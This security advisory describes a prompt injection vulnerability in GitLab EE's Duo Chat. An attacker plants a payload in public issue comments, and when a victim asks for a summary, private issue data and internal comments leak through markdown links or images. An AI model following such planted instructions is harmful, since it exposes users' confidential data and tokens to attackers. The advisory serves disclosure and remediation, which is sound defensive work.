GitLab EE Prompt Injection Vulnerability Leading to Unauthorized Data Exfiltration from Private Issues

A prompt injection vulnerability has been identified in GitLab EE versions 16.0 prior to 17.6.5, 17.7 prior to 17.7.4, and 17.8 prior to 17.8.2. This vulnerability allows an attacker to exfiltrate information from private issues by injecting prompts that are processed by the application's AI features. The attack involves manipulating issue comments to create links or images that, when accessed, leak confidential data to the attacker.

Impact

Exploitation of this vulnerability allows for the unauthorized access and exfiltration of sensitive information from private issues and internal comments, potentially including confidential tokens and other private data.

Reproduction

The vulnerability can be reproduced by an attacker who adds a prompt injection payload into a public issue's comments. When a victim accesses the issue and uses the Duo Chat feature to generate a summary, the injected prompt can be executed, causing private issue data or internal comments to be leaked through a markdown link or an image. This process can be automated to extract information more efficiently.

Remediation

Users can update to GitLab versions 17.8.2, 17.7.4, or 16.0-17.6.5 to address this vulnerability.